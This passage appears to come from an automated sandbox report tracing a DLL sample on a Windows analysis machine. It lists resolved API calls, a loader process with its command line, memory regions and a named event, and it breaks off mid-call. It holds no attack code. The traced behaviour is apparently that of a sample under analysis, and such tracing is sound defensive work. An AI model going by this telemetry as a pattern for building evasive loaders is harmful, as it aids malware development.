lpProcName="WriteFile") returned 0x76221400 [0034.190] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0034.190] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0034.190] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0034.190] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0034.190] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0034.190] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0034.190] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0034.190] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0034.190] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0034.190] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0034.190] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0034.190] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0034.190] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0034.191] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0034.191] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0034.191] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0034.191] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0034.191] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0034.191] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0034.191] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0034.191] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0034.191] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0034.191] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0034.191] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0034.191] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0034.191] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0034.191] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0034.191] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0034.191] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0034.192] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0034.192] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0034.192] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0034.192] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0034.192] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0034.207] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0034.207] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0034.207] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0034.207] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0034.207] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0034.207] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0034.207] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0034.207] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0034.207] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0034.207] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0034.207] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0034.207] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0034.207] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0034.207] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0034.208] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0034.208] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0034.208] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0034.208] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0034.208] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0034.208] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0034.208] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0034.232] AddAtomS () returned 0x0 [0034.234] HeapDestroy (hHeap=0x1390000) returned 1 Process: id = "43" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fb60" os_pid = "0xc80" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomT /fn_args=\"127.0.0.1\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1929 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1930 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1931 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1932 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1933 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 1934 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1935 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1936 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1937 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1938 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1939 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1940 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1941 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 1942 start_va = 0x5f0000 end_va = 0x5fffff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 1943 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1944 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1945 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1946 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1947 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1948 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1949 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1950 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1951 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1952 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1953 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1954 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1955 start_va = 0x1f0000 end_va = 0x2b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1956 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1957 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1958 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1959 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1960 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1961 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 1962 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1963 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 1964 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1965 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1966 start_va = 0x2c0000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 1967 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1968 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1969 start_va = 0x600000 end_va = 0x73ffff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Thread: id = 92 os_tid = 0xc84 [0034.256] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ef3dc | out: lpSystemTimeAsFileTime=0x1ef3dc*(dwLowDateTime=0xe2197290, dwHighDateTime=0x1d3dfba)) [0034.256] GetCurrentProcessId () returned 0xc80 [0034.256] GetCurrentThreadId () returned 0xc84 [0034.256] GetTickCount () returned 0x17b18 [0034.256] QueryPerformanceCounter (in: lpPerformanceCount=0x1ef3d4 | out: lpPerformanceCount=0x1ef3d4*=370207061) returned 1 [0034.267] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.267] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0034.267] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0034.267] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0034.267] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0034.267] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.267] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.267] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.267] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.267] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.267] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.268] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.268] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.268] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.268] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.268] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.268] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.268] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.268] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.269] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.269] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0034.269] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.269] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0034.269] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.269] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.269] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0034.269] GetCurrentThreadId () returned 0xc84 [0034.269] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomT /fn_args=\"127.0.0.1\"" [0034.269] GetEnvironmentStringsW () returned 0x357860* [0034.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0034.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x3309f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0034.270] FreeEnvironmentStringsW (penv=0x357860) returned 1 [0034.270] GetStartupInfoA (in: lpStartupInfo=0x1ef32c | out: lpStartupInfo=0x1ef32c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0034.270] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0034.270] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0034.270] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0034.270] SetHandleCount (uNumber=0x20) returned 0x20 [0034.270] GetLastError () returned 0x0 [0034.270] SetLastError (dwErrCode=0x0) [0034.270] GetLastError () returned 0x0 [0034.270] SetLastError (dwErrCode=0x0) [0034.270] GetLastError () returned 0x0 [0034.270] SetLastError (dwErrCode=0x0) [0034.270] GetACP () returned 0x4e4 [0034.270] GetLastError () returned 0x0 [0034.270] SetLastError (dwErrCode=0x0) [0034.270] IsValidCodePage (CodePage=0x4e4) returned 1 [0034.270] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1ef30c | out: lpCPInfo=0x1ef30c) returned 1 [0034.270] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1eedd8 | out: lpCPInfo=0x1eedd8) returned 1 [0034.271] GetLastError () returned 0x0 [0034.271] SetLastError (dwErrCode=0x0) [0034.271] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x1eed68 | out: lpCharType=0x1eed68) returned 1 [0034.271] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef1ec, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.271] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef1ec, cbMultiByte=256, lpWideCharStr=0x1eeb58, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā") returned 256 [0034.271] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā", cchSrc=256, lpCharType=0x1eedec | out: lpCharType=0x1eedec) returned 1 [0034.271] GetLastError () returned 0x0 [0034.271] SetLastError (dwErrCode=0x0) [0034.271] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0034.271] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef1ec, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.271] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1ef1ec, cbMultiByte=256, lpWideCharStr=0x1eeb28, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0034.271] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0034.271] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x1ee918, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0034.271] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x1ef0ec, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x13\x95Ðô$ó\x1e", lpUsedDefaultChar=0x0) returned 256 [0034.271] GetLastError 